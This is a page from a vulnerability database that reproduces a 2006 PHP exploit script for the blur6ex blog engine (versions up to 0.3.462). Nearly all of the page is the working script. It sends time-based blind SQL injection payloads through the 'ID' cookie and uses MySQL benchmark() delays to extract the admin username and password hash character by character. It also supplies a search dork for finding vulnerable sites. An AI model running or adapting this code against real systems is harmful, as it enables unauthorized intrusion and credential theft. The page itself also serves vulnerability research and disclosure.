Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit

🗓️ 12 Jun 2006 00:00:00Reported by rgodType 
zdt
 zdt🔗 0day.today👁 64 Views

blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploi

Code
======================================================================
blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit
======================================================================





#!/usr/bin/php -q -d short_open_tag=on
<?
echo "blur6ex <= 0.3.462 'ID' blind SQL injection / admin credentials disclosure\r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "dork: \"powered by blur6ex\"\r\n\r\n";
/*
works regardless of php.ini settings
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to blur6ex\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from default (no prefix)\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /blur6ex/ \r\n";
echo "php ".$argv[0]." localhost /blur6ex/ -Tblur6ex_\r\n";
die;
}

/*
software site: http://www.blursoft.com/blur6ex/

vulnerable code in engine/shards/blog.php near lines 497-500:

...
case "proc_reply":
    // In order to set the permissions of the reply it's necessary to know what the parent is
    $permissionid = mysql_query("SELECT permission FROM blog WHERE ID=" . $_REQUEST['ID']);
...

'ID' argument in not sanitized before to be used in a sql query,
injection is blind...

this code shows how to use time delays through Mysql benchmark() function,
u can use this technique to ask questions of the target system
and retrieve data from tables

									      */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function my_encode($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="";
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$admin="";
$j=1;
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $starttime=time();
  echo "starttime -> ".$starttime."\r\n";
  $sql="99999 UNION SELECT IF((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(50000000,CHAR(0)),0) FROM ".$prefix."permissiongroups WHERE PGroup=CHAR(97,100,109,105,110)";
  $sql=str_replace(" ","/**/",$sql);
  $sql=urlencode($sql);
  $packet ="GET ".$p."index.php?shard=blog&action=proc_reply HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: ID=".$sql.";\r\n"; //through cookies, log this
  $packet.="Connection: Close\r\n\r\n";
  echo quick_dump($packet)."\r\n";
  sendpacketii($packet);
  $endtime=time();
  echo "endtime -> ".$endtime."\r\n";
  $difftime=$endtime - $starttime;
  echo "difftime -> ".$difftime."\r\n";
  if ($difftime > 5) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;}
  if (($i==255) | (eregi("doesn't exist",$html))) {
  //debug
  echo $html."\r\n";
  die("Exploit failed...maybe wrong table prefix");
  }
}
$j++;
}
$admin=str_replace(chr(0),"",$admin);
echo "admin -> ".$admin."\r\n";

$password="";
$j=1;
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $starttime=time();
  echo "starttime -> ".$starttime."\r\n";
  $sql="99999 UNION SELECT IF((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(50000000,CHAR(0)),0) FROM ".$prefix."users WHERE username=".my_encode($admin);
  $sql=str_replace(" ","/**/",$sql);
  $sql=urlencode($sql);
  $packet ="GET ".$p."index.php?shard=blog&action=proc_reply HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: ID=".$sql.";\r\n";
  $packet.="Connection: Close\r\n\r\n";
  echo quick_dump($packet)."\r\n";
  sendpacketii($packet);
  $endtime=time();
  echo "endtime -> ".$endtime."\r\n";
  $difftime=$endtime - $starttime;
  echo "difftime -> ".$difftime."\r\n";
  if ($difftime > 5) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
  if ($i==255) {die("Exploit failed...we have an admin user in 'permissiongroups' table, but for some reason there is not a '".$admin."' user in 'users' one...");}
}
$j++;
}
//if you are here...
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (sha1)-> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
?>



#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jun 2006 00:00Current
7.1High risk
Vulners AI Score7.1
blur6ex0.3.462admin disclosureblind sql injectionexploitphpblogsql querytime delays
64